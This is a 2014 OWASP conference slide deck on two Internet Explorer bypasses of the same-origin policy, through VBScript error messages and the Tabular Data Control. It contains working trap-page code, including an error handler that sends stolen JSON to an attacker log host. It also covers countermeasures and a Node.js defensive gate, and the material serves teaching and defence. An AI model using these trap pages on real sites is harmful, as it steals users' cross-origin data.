Bypass SOP, Theft Your Data
- XSS Allstars from Japan -
Yosuke HASEGAWA
OWASP AppSec APAC 2014
About Me
Yosuke HASEGAWA @hasegawayosuke
Engineer at NetAgent Co., Ltd.
Technical adviser, Secure Sky Technology Inc.
http://utf-8.jp/
author of jjencode, aaencode, ...
OWASP Kansai Chapter Leader
OWASP Japan Chapter Advisory Board member
Agenda
Cross-origin information disclosure
Not XSS, but a bypass of the Same-Origin Policy (SOP)
Two techniques that still work on modern IE:
VBScript error message
Tabular Data Control
VBScript Error Msg
Target: IE9-10 (IE6-8 are safe, wow!)
A trap page created by the attacker loads a cross-origin JSON array as VBScript
VBScript raises an exception whose error message includes the JSON content
JavaScript on the trap page can read the JSON content through that error message
VBScript Error Msg
Loading JSON as a VBScript src fails → raises an exception
// Trap page by attacker
<script src="http://example.jp/target.json"
        language="vbscript">
</script>
// Target resource on example.jp (cross-origin, carries secret data)
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
[ "secret", "data", "is", "here" ]
VBScript Error Msg
Catch the error message with an error handler
// Trap page by attacker
<img id="img">
<script>
window.onerror = function( e ){
  // e is the error message string; it carries the JSON body
  document.getElementById( "img" ).setAttribute(
    "src", "http://attacker.utf-8.jp/log?" + e );
}
</script>
<script src="http://example.jp/target.json"
        language="vbscript"></script>
// Resulting request to the attacker's log server (captured)
GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'
%20"secret",%20"data",%20"is",%20"here"%20' HTTP/1.1
Referer: http://attacker.utf-8.jp/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT
6.1; WOW64; Trident/6.0)
Countermeasure
Add "X-Content-Type-Options: nosniff" to the response
HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
[ "secret", "data", "is", "here" ]
VBScript Error Msg: supplementary
Dec 2012: reported to MS by me and @masa141421356
May 2013: fixed by MS13-037 only for IE6-8; IE9-10 were not fixed.
"Add the X-C-T-O header for IE9-11 to prevent this attack; this is BEHAVIOR BY DESIGN," they said.
Tabular Data Control
Tabular Data Control (TDC)
ActiveX control for binding a text file into HTML as a data table
http://msdn.microsoft.com/en-us/library/ms531356.aspx
Enabled by default on IE6-IE11 when the page runs in an older document mode, which a page can force with:
<meta http-equiv="x-ua-compatible" content="IE=10">
Spotlighted by the Cure53 X-Mas Challenge
https://cure53.de/xmas2013/
https://cure53.de/xmas2013/writeup
The winner was @kinugawamasato
Tabular Data Control
// Trap page by attacker on attacker.utf-8.jp
<script>
function show(){
  // recordset.getString() returns the whole bound text file
  var s = document.getElementById("tdc")
            .recordset.getString();
  alert( s );
}
</script>
...
<meta http-equiv="x-ua-compatible" content="IE=10" >
<object id="tdc" ondatasetcomplete="show()"
        classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
  <param name="DataURL" value="http://example.jp/target.txt">
</object>
// Target resource with secret data on example.jp/target.txt
// (nosniff and attachment headers are present, but they do not stop TDC)
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
Tabular Data Control
The attacker has to get "@!allow_domains=..." inserted at the top of the target text
Once it is inserted, no response header prevents the theft
Unhelpful:
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Countermeasure
Restrict access to XHR requests that carry a custom X- header
(<script src> and the TDC DataURL fetch cannot add such a header)
and / or...
var xhr = new XMLHttpRequest();
xhr.open( "GET", "http://example.jp/target.txt", true );
xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
xhr.send( null );
GET /target.txt HTTP/1.1
Host: example.jp
User-Agent: Mozilla/5.0…
Accept: */*
X-Requested-With: XMLHttpRequest
Countermeasure (cont.)
Don't let attacker-controlled text appear at the top of the content
// Target resource with secret data on example.jp/target.txt
Content-Type: application/octet-stream
Content-Disposition: attachment; filename=bindata
X-Content-Type-Options: nosniff
// the first line below is the attacker-planted TDC directive
@!allow_domains=attacker.utf-8.jp
secret,data,is,here
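The three countermeasures in this deck (nosniff on every response, an XHR-only gate keyed on a custom X- header, and keeping attacker text off the first line of a TDC-readable file) put together as one Node.js request gate. This is an added example, not code from the slides or from any product: the endpoint path /target.txt, the sample records and the request objects are constructed for illustration, and it assumes, as the slides describe, that TDC only honours an "@!" directive on the first line of the text.

```javascript
'use strict';
// Added example: a request gate for a sensitive text/JSON resource that applies
// the three countermeasures from the slides. The path, records and request
// objects below are constructed for illustration (not from the original deck).

// Constructed record store. The second record is attacker-supplied text that
// tries to plant a TDC directive.
const RECORDS = [
  'secret,data,is,here',
  '@!allow_domains=attacker.utf-8.jp',
];

// 1. nosniff on every response, so IE does not execute a JSON/text body
//    pulled in through <script language="vbscript" src=...>.
function secureHeaders(contentType) {
  return {
    'Content-Type': contentType,
    'X-Content-Type-Options': 'nosniff',
    'Cache-Control': 'no-store',
  };
}

// 2. <script src>, <object> with a TDC DataURL, and plain navigations cannot
//    attach a custom request header; same-origin XHR can. A cross-origin XHR
//    would need a CORS preflight for this header, which this server never grants.
//    Node lower-cases incoming header names, so the lookup key is lower-case.
function isTrustedXhr(headers) {
  return Boolean(headers) && headers['x-requested-with'] === 'XMLHttpRequest';
}

// 3. User-controlled text must never be the first line of the served file,
//    where TDC reads "@!" directives (assumption: first line only, as the slides
//    describe). A server-owned CSV header goes first, and any record that itself
//    starts with "@!" is dropped rather than served.
function renderCsv(records) {
  const safe = records.filter((r) => !/^\s*@!/.test(r));
  return ['col1,col2,col3,col4', ...safe].join('\n') + '\n';
}

// Pure decision function: takes a plain {method, url, headers} object and
// returns {status, headers, body}, so the gate is testable without sockets.
function respond(req) {
  const text = 'text/plain; charset=utf-8';
  if (req.method !== 'GET' || req.url !== '/target.txt') {
    return { status: 404, headers: secureHeaders(text), body: 'not found\n' };
  }
  if (!isTrustedXhr(req.headers)) {
    // Same answer for a VBScript <script src> and for a TDC DataURL fetch.
    return { status: 403, headers: secureHeaders(text), body: 'forbidden\n' };
  }
  return {
    status: 200,
    headers: secureHeaders('text/csv; charset=utf-8'),
    body: renderCsv(RECORDS),
  };
}

// Real HTTP front-end for manual testing: node gate.js --serve
function startServer(port) {
  const http = require('http');
  return http
    .createServer((req, res) => {
      const out = respond({ method: req.method, url: req.url, headers: req.headers });
      res.writeHead(out.status, out.headers);
      res.end(out.body);
    })
    .listen(port);
}

if (process.argv.includes('--serve')) {
  startServer(8080);
  console.log('gate listening on http://127.0.0.1:8080/target.txt');
}
```

The header gate only distinguishes an XHR from a tag-based fetch (<script src>, an <object> DataURL, a navigation); it is not authentication, so keep the normal session check in front of it. Running the file with --serve lets you confirm the behaviour from a browser: a plain navigation to /target.txt gets 403, while the XHR shown on the previous slide gets the CSV with nosniff set.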
Conclusion
IE still has funny behavior today
Add X-Content-Type-Options: nosniff to all resources
Restrict access to XHR requests that carry a custom X- header
Questions?
hasegawa@utf-8.jp
@hasegawayosuke
http://utf-8.jp/